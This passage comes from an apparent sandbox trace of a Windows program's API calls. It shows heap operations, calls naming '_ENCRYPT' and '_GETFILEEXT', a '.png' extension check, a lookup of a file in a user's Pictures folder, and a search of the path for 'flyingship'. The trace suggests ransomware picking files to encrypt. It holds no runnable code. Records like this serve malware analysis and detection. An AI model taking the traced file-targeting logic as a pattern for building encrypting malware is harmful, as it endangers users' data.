lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.790] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0189.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0189.791] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.792] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.793] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0189.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd6f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0189.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.793] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0189.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0189.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.793] CloseHandle (hObject=0x160) returned 1 [0189.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.794] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.795] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.795] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.795] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0189.795] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.795] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0189.795] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0189.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.796] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.796] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.796] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac9aec00, ftCreationTime.dwHighDateTime=0x1d5dea2, ftLastAccessTime.dwLowDateTime=0x35a7ad10, ftLastAccessTime.dwHighDateTime=0x1d5e585, ftLastWriteTime.dwLowDateTime=0x35a7ad10, ftLastWriteTime.dwHighDateTime=0x1d5e585, nFileSizeHigh=0x0, nFileSizeLow=0x18b97, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="qiez.png", cAlternateFileName="")) returned 0x90add8 [0189.796] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.796] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac9aec00, ftCreationTime.dwHighDateTime=0x1d5dea2, ftLastAccessTime.dwLowDateTime=0x35a7ad10, ftLastAccessTime.dwHighDateTime=0x1d5e585, ftLastWriteTime.dwLowDateTime=0x35a7ad10, ftLastWriteTime.dwHighDateTime=0x1d5e585, nFileSizeHigh=0x0, nFileSizeLow=0x18b97, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="qiez.png", cAlternateFileName="")) returned 0x90add8 [0189.797] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.797] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 